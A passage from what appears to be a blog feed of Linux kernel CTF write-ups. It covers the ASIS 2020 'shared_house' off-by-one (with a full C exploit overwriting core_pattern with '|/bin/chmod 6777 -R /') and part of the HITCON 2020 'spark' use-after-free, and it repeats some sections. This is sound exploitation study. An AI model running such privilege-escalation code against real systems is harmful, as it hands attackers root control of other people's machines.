style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> <span style="color:#a6e22e">copy_from_user</span>(note, req.data, req.size)) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> note[req.size] <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#75715e">// off-by-one if req.size==size </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0xC12ED004</span> <span style="color:#f92672">||</span> <span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">copy_to_user</span>(req.data, note, </span></span><span style="display:flex;"><span> req.size)) { <span style="color:#75715e">// cmd == 0xC12ED004: read_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>ERROR: </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22</span>; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>The vulnerability is obvious. The <a href="https://en.wikipedia.org/wiki/Off-by-one_error">off-by-one</a> in write_note.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="enviroment">Enviroment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v4.19.98/source"><code>4.19.98</code></a> <ul> <li>No SMAP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="features">Features</h3> <p>This challenge provide simple device (it has only one function: <code>mod_ioctl</code>). And the function is like following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> </span></span><span style="display:flex;"><span>{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> __padding0[<span style="color:#ae81ff">4</span>]; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span>data; </span></span><span style="display:flex;"><span>}; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>uint64_6 <span style="color:#a6e22e">mod_ioctl</span>(<span style="color:#66d9ef">struct</span> file <span style="color:#f92672">*</span>a1, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> cmd, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">__int64</span> arg) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> req; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">copy_from_user</span>(<span style="color:#f92672">&amp;</span>req, arg, <span style="color:#ae81ff">0x10LL</span>)) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">14LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (req.size <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">0x80</span>) <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22LL</span>; </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_lock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED002</span>) { <span style="color:#75715e">// cmd == 0xC12ED002: delete_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED001</span>) { <span style="color:#75715e">// cmd == 0xC12ED001: alloc_new_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (note) <span style="color:#a6e22e">kfree</span>(note); </span></span><span style="display:flex;"><span> size <span style="color:#f92672">=</span> req.size; </span></span><span style="display:flex;"><span> note <span style="color:#f92672">=</span> (<span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>)<span style="color:#a6e22e">_kmalloc</span>(req.size, <span style="color:#ae81ff">0x6080C0LL</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note) <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">==</span> <span style="color:#ae81ff">0xC12ED003</span>) { <span style="color:#75715e">// cmd == 0xC12ED003: write_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> <span style="color:#a6e22e">copy_from_user</span>(note, req.data, req.size)) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> note[req.size] <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; <span style="color:#75715e">// off-by-one if req.size==size </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (cmd <span style="color:#f92672">!=</span> <span style="color:#ae81ff">0xC12ED004</span> <span style="color:#f92672">||</span> <span style="color:#f92672">!</span>note <span style="color:#f92672">||</span> req.size <span style="color:#f92672">&gt;</span> size <span style="color:#f92672">||</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">copy_to_user</span>(req.data, note, </span></span><span style="display:flex;"><span> req.size)) { <span style="color:#75715e">// cmd == 0xC12ED004: read_note </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span> <span style="color:#66d9ef">goto</span> ERROR; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0LL</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span>ERROR: </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">mutex_unlock</span>(<span style="color:#f92672">&amp;</span>_mutex); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">22</span>; </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>The vulnerability is obvious. The <a href="https://en.wikipedia.org/wiki/Off-by-one_error">off-by-one</a> in write_note.</p> <h2 id="exploit">Exploit</h2> <p>Since the off-by-one occurs in heap chunk, I decide to use <a href="https://elixir.bootlin.com/linux/v4.19.98/source/include/linux/msg.h#L9"><code>struct msg_msg</code></a> and free list. Unlike The free list is in middle and stored protected in latest kernel, it is in front and stored raw in the provided kernel.</p> <h3 id="trigger-off-by-one">Trigger off-by-one</h3> <p>Triggering off-by-one is simple:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_alloc_new_note</span>(<span style="color:#ae81ff">0x20</span>); </span></span><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_write_note</span>(buf, <span style="color:#ae81ff">0x20</span>); <span style="color:#75715e">// Trigger off-by-one </span></span></span></code></pre></div><h3 id="get-controlleduaf-msg_msg-chunk">Get controlled(UAF) msg_msg chunk</h3> <p>In <code>struct msg_msg</code>, the <code>m_list.next</code> and <code>m_list.prev</code> exist. And they are connected with other messages by using double linked list.</p> <p>Because we can overwrite 1 byte after our <code>note</code>, we can overwrite LSB of <code>m_list.next</code> if the message is located after our <code>note</code>. My plain is &ldquo;making dangling pointer in <code>m_list</code> to free-ed message and make the free-ed chunk become our note.</p> <p>For example, initial messages (consider all messages locate consequently):</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| B A --&gt;|prev| E B[msg 2] --&gt;|next| C B --&gt;|prev| A C[msg 3] --&gt;|next| D C --&gt;|prev| B D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>And free middle message (msg 2) via <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1098"><code>do_msgrcv</code></a> and allocate it as our note:</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| C A --&gt;|prev| E B[msg 2 = our note] C[msg 3] --&gt;|next| D C --&gt;|prev| A D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>Make invalid <code>m_list.next</code> via triggering off-by-one:</p> <pre class="mermaid"> graph LR A[msg 1] --&gt;|next| C A --&gt;|prev| E B[msg 2 = our note] C[msg 3; next is corrupted] --&gt;|next| E C --&gt;|prev| A D[msg 4] --&gt;|next| E D --&gt;|prev| C E[msg 5] --&gt;|next| F E --&gt;|prev| D F[msg 6] --&gt;|next| A F --&gt;|prev| E </pre> <p>With this connections, the <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1163">unlink</a> of <code>msg 5</code> and <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msg.c#L1259"><code>free_msg</code></a> to it make dangling pointer to <code>msg 5</code> in <code>msg 3</code>.</p> <p>After freeing <code>msg 5</code>, the allocated note will be have same address with <code>msg 5</code>. Then we can make <code>limited_aar</code> using <code>next</code> in <code>struct msg_msg</code>. The disadventage of <code>limited_aar</code> is 1. the first 8 bytes must be zeros (because of <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msgutil.c#L161"><code>store_msg</code></a>) 2. the read address will be freed (because of <a href="https://elixir.bootlin.com/linux/v6.13.4/source/ipc/msgutil.c#L180"><code>free_msg</code></a>).</p> <p>But we can leak the address of <code>msg 5</code>(UAF chunk) and kernel base only with <code>limited_arr</code>.</p> <h3 id="overwrite-free-list-and-allocate-arbitrary-address-via-kmalloc">Overwrite free list and allocate arbitrary address via <code>kmalloc</code></h3> <p>Okay, now we can allocate arbitrary address by modifying free list in free-ed chunk. Currently the <code>note</code> (this is same as <code>msg 5</code>) is freed and thus it has pointer to next free-ed chunk. So overwriting it with <code>core_pattern</code> address, allocating serveral chunks and ETC give us the <code>core_pattern</code> as <code>note</code>.</p> <h3 id="code">Code</h3> <div class="collapsable-code"> <input id="295763184" type="checkbox" checked /> <label for="295763184"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">AsisCTF2020Qual-shared_house-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;fcntl.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;stddef.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/ipc.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/msg.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;unistd.h&gt; #define KERNEL_BASE_START 0xffffffff81000000 #define KERNEL_BASE_END 0xffffffffc0000000 #define KERNEL_BASE_MASK (~0x00000000000fffff) #define IS_IN_KERNEL_RANGE(addr) \ ((addr) &gt;= KERNEL_BASE_START &amp;&amp; (addr) &lt;= KERNEL_BASE_END) #define MOD_PROBE_OFFSET (0xffffffff81c2c540 - KERNEL_BASE_START) #define CORE_PATTERN_OFFSET (0xffffffff81c36c80 - KERNEL_BASE_START) static void get_enter_to_continue(const char* msg); static void fatal(const char* msg); void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } struct msg_msgseg { struct msg_msgseg* next; char data[0]; }; struct msg_msg { struct msg_msg *next, *prev; long m_type; size_t m_ts; struct msg_msgseg* next_data; void* security; char data[0]; }; struct msgbuf { long mtype; /* message type, must be &gt; 0 */ char mtext[1]; /* message data */ }; int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag); int send_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; memcpy(m-&gt;mtext, data, size); m-&gt;mtype = mtype; ret = msgsnd(msgqid, m, size, mflag); free(m); return ret; } int recv_msg(int msgqid, char* data, size_t size, long mtype, long mflag) { struct msgbuf* m = malloc(sizeof(long) + size); int ret = -1; m-&gt;mtype = mtype; ret = msgrcv(msgqid, m, size, mtype, mflag); memcpy(data, m-&gt;mtext, size); free(m); return ret; } #define VULN_DEV_NAME &#34;/dev/note&#34; #define VULN_DEV_CONST_MAX_SIZE 0x80 #define VULN_DEV_CMD_ALLOC_NEW_NOTE 0xC12ED001 #define VULN_DEV_CMD_DELTE_NOTE 0xC12ED002 #define VULN_DEV_CMD_WRITE_NOTE 0xC12ED003 #define VULN_DEV_CMD_READ_NOTE 0xC12ED004 typedef struct request_t { unsigned int size; char __padding[4]; uint64_t data; } request_t; static int vuln_dev_alloc_new_note(unsigned int size); static int vuln_dev_delete_note(); static int vuln_dev_write_note(const void* data, unsigned int size); static int vuln_dev_read_note(void* data, unsigned int size); int vuln_fd = 0; static int vuln_dev_alloc_new_note(unsigned int size) { request_t req = {.size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_ALLOC_NEW_NOTE, &amp;req); } static int vuln_dev_delete_note() { request_t req = {.size = 0}; return ioctl(vuln_fd, VULN_DEV_CMD_ALLOC_NEW_NOTE, &amp;req); } static int vuln_dev_write_note(const void* data, unsigned int size) { request_t req = {.data = (uint64_t)data, .size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_WRITE_NOTE, &amp;req); } static int vuln_dev_read_note(void* data, unsigned int size) { request_t req = {.data = (uint64_t)data, .size = size}; return ioctl(vuln_fd, VULN_DEV_CMD_READ_NOTE, &amp;req); } int target_obj_size = 0; int msgqid = 0; void* fake_msgmsg = NULL; int uaf_msgmsg_mtype = 0; static int make_uaf_msgmsg(char* temp_buf) { char* buf = temp_buf; buf[target_obj_size - 1] = 0; for (int i = 0; i &lt; 0x10; ++i) { memset(buf, i, target_obj_size - 0x30); send_msg(msgqid, buf, target_obj_size - 0x30, 0x10 - i, 0); } recv_msg(msgqid, buf, target_obj_size - 0x30, 0, 0); vuln_dev_alloc_new_note(target_obj_size); memset(buf, 0, target_obj_size); vuln_dev_write_note(buf, target_obj_size); // Trigger off-by-one vuln_dev_delete_note(); for (int i = 0; i &lt; 0x10; ++i) { memset(buf, 0, target_obj_size); vuln_dev_delete_note(); int t = recv_msg(msgqid, buf, target_obj_size, -(i + 1), 0); if (*buf == &#39;A&#39;) { return -(i + 1); } else if (i == 0x10 - 1) { fatal(&#34;[-] Failed to find UAF msg_msg&#34;); } vuln_dev_alloc_new_note(target_obj_size); memset(buf, 0, target_obj_size); struct msg_msg* fake_msg = (struct msg_msg*)buf; fake_msg-&gt;next = (struct msg_msg*)fake_msg; fake_msg-&gt;prev = (struct msg_msg*)fake_msg; fake_msg-&gt;m_type = 1; fake_msg-&gt;m_ts = target_obj_size; memset(fake_msg-&gt;data, &#39;A&#39;, 1); vuln_dev_write_note(buf, target_obj_size); } return 1; } /// @brief Limited AAR primitive. The 8 bytes before target address must be /// zeros. /// @param out_data: output buffer /// @param addr: target address /// @param size: size of output buffer. size must be less than or equal to /// (0x1000-0x10) /// @return positive on success, -1 on failure static int limited_aar(char* out_data, uint64_t addr, uint64_t size) { int ret; char* buf[target_obj_size]; memset(buf, 0, sizeof(buf)); struct msg_msg* uaf_msg = (struct msg_msg*)buf; uaf_msg-&gt;next = (struct msg_msg*)fake_msgmsg; uaf_msg-&gt;prev = (struct msg_msg*)fake_msgmsg; uaf_msg-&gt;m_type = 1; uaf_msg-&gt;m_ts = 0x1000 - offsetof(struct msg_msg, data) + size; uaf_msg-&gt;next_data = (struct msg_msgseg*)(addr - 8); vuln_dev_write_note(buf, target_obj_size); char temp_buf[0x2000]; ret = recv_msg(msgqid, temp_buf, 0x2000, uaf_msgmsg_mtype, 0); memcpy(out_data, temp_buf + 0x1000 - offsetof(struct msg_msg, data), size - 8); } static int leak_uaf_chunk_addr_and_kernel_addr(uint64_t pre_uaf_msg_addr, char* temp_buf, uint64_t* out_uaf_chunk_addr, uint64_t* out_kernel_base) { char* buf[target_obj_size]; memset(buf, 0, sizeof(buf)); *out_uaf_chunk_addr = 0; *out_kernel_base = 0; limited_aar(temp_buf, pre_uaf_msg_addr, 0x1000 - offsetof(struct msg_msgseg, data)); vuln_dev_read_note(buf, target_obj_size); *out_uaf_chunk_addr = *(uint64_t*)buf; uint64_t* uint64_buf = (uint64_t*)temp_buf; for (int i = 0; i &lt; (0x2000 - offsetof(struct msg_msg, data) - offsetof(struct msg_msgseg, data)) / 8; ++i) { if (IS_IN_KERNEL_RANGE(uint64_buf[i])) { uint64_t min_addr = uint64_buf[i] &amp; KERNEL_BASE_MASK; if (*out_kernel_base == 0 || min_addr &lt; *out_kernel_base) { *out_kernel_base = min_addr; } } } if (*out_kernel_base == 0 || *out_uaf_chunk_addr == 0) { return -1; } return 0; } int main() { vuln_fd = open(VULN_DEV_NAME, O_RDONLY); if (vuln_fd &lt; 0) { fatal(&#34;open(&#34; VULN_DEV_NAME &#34;)&#34;); } target_obj_size = 0x80; char buf[target_obj_size]; uint64_t* uint64_buf = (uint64_t*)buf; memset(buf, 0, sizeof(buf)); msgqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); if (msgqid &lt; 0) { fatal(&#34;msgget&#34;); } fake_msgmsg = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (fake_msgmsg == MAP_FAILED) { fatal(&#34;mmap&#34;); } printf(&#34;[*] fake_msgmsg: %p\n&#34;, fake_msgmsg); uaf_msgmsg_mtype = make_uaf_msgmsg(buf); if (uaf_msgmsg_mtype &gt; 0) { printf(&#34;[-] Failed to find UAF msg_msg\n&#34;); return -1; } uint64_t prev_uaf_msg = uint64_buf[88 / 8]; printf(&#34;[+] Found UAF msg_msg with mtype: %d\n&#34;, uaf_msgmsg_mtype); printf(&#34; [*] Now note is same as UAF msg_msg\n&#34;); printf(&#34; [*] The prev of UAF msg_msg is 0x%016lx\n&#34;, prev_uaf_msg); vuln_dev_alloc_new_note(target_obj_size); printf(&#34;[*] Leaking UAF chunk addr and kernel base...\n&#34;); char* temp_buf = malloc(0x2000); uint64_t uaf_chunk_addr, kernel_addr; if (leak_uaf_chunk_addr_and_kernel_addr(prev_uaf_msg, temp_buf, &amp;uaf_chunk_addr, &amp;kernel_addr) &lt; 0) { printf(&#34; [-] Failed to leak uaf chunk addr and kernel base\n&#34;); return -1; } printf(&#34; [+] Found UAF chunk address: 0x%016lx\n&#34;, uaf_chunk_addr); printf(&#34; [+] Found kernel address: 0x%016lx\n&#34;, kernel_addr); printf(&#34;[*] Overwrite free list to overwrite modprobe_path\n&#34;); int msgqid2 = msgget(IPC_PRIVATE, 0644 | IPC_CREAT); if (msgqid2 &lt; 0) { fatal(&#34;msgget&#34;); } uint64_t next_free_chunk = kernel_addr + CORE_PATTERN_OFFSET - 8; printf(&#34; [*] Overwriting free list at 0x%016lx to 0x%016lx\n&#34;, uaf_chunk_addr, next_free_chunk); vuln_dev_write_note(&amp;next_free_chunk, 8); printf(&#34; [*] Consume chunks in free list&#34;); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x10, 0); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x11, 0); vuln_dev_delete_note(); send_msg(msgqid2, temp_buf, 0x80 - offsetof(struct msg_msg, data), 0x12, 0); printf(&#34; [*] Now allocate note with addr=0x%016lx\n&#34;, next_free_chunk); vuln_dev_alloc_new_note(0x80); char new_core_pattern[] = &#34;|/bin/chmod 6777 -R /&#34;; memset(temp_buf, 0, 0x2000); strcpy(temp_buf + 8, new_core_pattern); printf(&#34;[*] Overwrite core_pattern to \&#34;%s\&#34;\n&#34;, new_core_pattern); vuln_dev_write_note(temp_buf, 8 + sizeof(new_core_pattern)); { int fd = open(&#34;/proc/sys/kernel/core_pattern&#34;, O_RDONLY); char core[0x100]; read(fd, core, sizeof(core)); if (memcmp(core, new_core_pattern, sizeof(new_core_pattern) - 1) != 0) { printf(&#34; [-] Failed to overwrite core_pattern (core_pattern=\&#34;%s\&#34;)\n&#34;, core); return -1; } } printf(&#34; [+] Successfully overwrite core_pattern\n&#34;); printf(&#34;[*] Trigger core_pattern\n&#34;); uint64_t* evil = (uint64_t*)0xdeadbeef; *evil = 0; close(vuln_fd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/ASIS/2020/Quals/shared_house">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/ASIS/2020/Quals/shared_house</a></li> <li><a href="https://duasynt.com/blog/cve-2016-6187-heap-off-by-one-exploit">https://duasynt.com/blog/cve-2016-6187-heap-off-by-one-exploit</a></li> </ul> HITCON2020 spark /posts/kernel/write-ups/ctf/hitcon2020-spark/ Tue, 18 Feb 2025 15:33:22 +0000 /posts/kernel/write-ups/ctf/hitcon2020-spark/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.9.11/source"><code>5.9.11</code></a> <ul> <li>No SMAP</li> <li>No SMEP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="module">Module</h3> <p>The source code of module is not provided, but the challenge gives us the demo program using it.</p> <div class="collapsable-code"> <input id="516873924" type="checkbox" checked /> <label for="516873924"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-demo.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>/* * This is a demo program to show how to interact with SPARK. * Don&#39;t waste time on finding bugs here ;) * * Copyright (c) 2020 david942j */ #include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/spark.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define DEV_PATH &#34;/dev/node&#34; #define N 6 static int fd[N]; const char l[] = &#34;ABCDEF&#34;; /* B -- 10 -- D -- 11 -- F / \ | 4 | | / | | A 5 4 \ | | 2 | | \ | | C -- 3 - E */ static void link(int a, int b, unsigned int weight) { printf(&#34;Creating link between &#39;%c&#39; and &#39;%c&#39; with weight %u\n&#34;, l[a], l[b], weight); assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight &lt;&lt; 32)) == 0); } static void query(int a, int b) { struct spark_ioctl_query qry = { .fd1 = fd[a], .fd2 = fd[b], }; assert(ioctl(fd[0], SPARK_QUERY, &amp;qry) == 0); printf(&#34;The length of shortest path between &#39;%c&#39; and &#39;%c&#39; is %lld\n&#34;, l[a], l[b], qry.distance); } int main(int argc, char *argv[]) { for (int i = 0; i &lt; N; i++) { fd[i] = open(DEV_PATH, O_RDONLY); assert(fd[i] &gt;= 0); } link(0, 1, 4); link(0, 2, 2); link(1, 2, 5); link(1, 3, 10); link(2, 4, 3); link(3, 4, 4); link(3, 5, 11); assert(ioctl(fd[0], SPARK_FINALIZE) == 0); query(0, 5); query(3, 2); query(2, 5); for (int i = 0; i &lt; N; i++) close(fd[i]); return 0; } </code></pre></div> <p>As we can see in <code>demo.c</code>, this module is for a shortest path search. And each node can be allocated by <code>open</code> and two nodes can be linked by <code>link</code>. The searching path is done by <code>query</code>.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>linux version: <a href="https://elixir.bootlin.com/linux/v5.9.11/source"><code>5.9.11</code></a> <ul> <li>No SMAP</li> <li>No SMEP</li> <li>No KPTI</li> </ul> </li> </ul> <h3 id="module">Module</h3> <p>The source code of module is not provided, but the challenge gives us the demo program using it.</p> <div class="collapsable-code"> <input id="516873924" type="checkbox" checked /> <label for="516873924"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">HITCON2020-spark-demo.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>/* * This is a demo program to show how to interact with SPARK. * Don&#39;t waste time on finding bugs here ;) * * Copyright (c) 2020 david942j */ #include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/spark.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;unistd.h&gt; #define DEV_PATH &#34;/dev/node&#34; #define N 6 static int fd[N]; const char l[] = &#34;ABCDEF&#34;; /* B -- 10 -- D -- 11 -- F / \ | 4 | | / | | A 5 4 \ | | 2 | | \ | | C -- 3 - E */ static void link(int a, int b, unsigned int weight) { printf(&#34;Creating link between &#39;%c&#39; and &#39;%c&#39; with weight %u\n&#34;, l[a], l[b], weight); assert(ioctl(fd[a], SPARK_LINK, fd[b] | ((unsigned long long)weight &lt;&lt; 32)) == 0); } static void query(int a, int b) { struct spark_ioctl_query qry = { .fd1 = fd[a], .fd2 = fd[b], }; assert(ioctl(fd[0], SPARK_QUERY, &amp;qry) == 0); printf(&#34;The length of shortest path between &#39;%c&#39; and &#39;%c&#39; is %lld\n&#34;, l[a], l[b], qry.distance); } int main(int argc, char *argv[]) { for (int i = 0; i &lt; N; i++) { fd[i] = open(DEV_PATH, O_RDONLY); assert(fd[i] &gt;= 0); } link(0, 1, 4); link(0, 2, 2); link(1, 2, 5); link(1, 3, 10); link(2, 4, 3); link(3, 4, 4); link(3, 5, 11); assert(ioctl(fd[0], SPARK_FINALIZE) == 0); query(0, 5); query(3, 2); query(2, 5); for (int i = 0; i &lt; N; i++) close(fd[i]); return 0; } </code></pre></div> <p>As we can see in <code>demo.c</code>, this module is for a shortest path search. And each node can be allocated by <code>open</code> and two nodes can be linked by <code>link</code>. The searching path is done by <code>query</code>.</p> <p>I think these are all knowlege which we can know from <code>demo.c</code>. So I do reserving <code>spark.ko</code>. The module has 4 features: link, finalize, query, get_info.</p> <h3 id="vulnerability">Vulnerability</h3> <p>The vulnerability is in <code>spark_node_put</code>. When we <code>close</code> the node and if the reference count is one, <code>free</code> the node itself and its double linked list nodes. But when <code>free</code> the node, the node in other node (which is linked with the closed node) is not freed.</p> <p>For example, we allocate 2 nodes(node A and node B) via <code>open</code> and link them. The node A&rsquo;s fd and bk has the pointer to node B. And of course, node B has the pointer to node A in fd and bk. After linking, if we <code>close</code> node B, the node B is free-ed but the pointer in node A is not deleted.</p> <p>The fd and bk in each node are used in <code>spark_node_finalize</code> and <code>spark_graph_query</code>.</p> <h2 id="exploit">Exploit</h2> <h3 id="trigger-uaf">Trigger UAF</h3> <p>As I explained in above, the UAF can be caused by following code:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">int</span> fds[<span style="color:#ae81ff">2</span>]; </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> <span style="color:#66d9ef">sizeof</span>(fds) <span style="color:#f92672">/</span> <span style="color:#ae81ff">4</span>; <span style="color:#f92672">++</span>i) { </span></span><span style="display:flex;"><span> fds[i] <span style="color:#f92672">=</span> <span style="color:#a6e22e">open</span>(VULN_DEV_NAME, O_RDONLY); </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span><span style="color:#a6e22e">vuln_dev_link</span>(fds[<span style="color:#ae81ff">0</span>], fds[<span style="color:#ae81ff">1</span>], <span style="color:#ae81ff">0</span>); 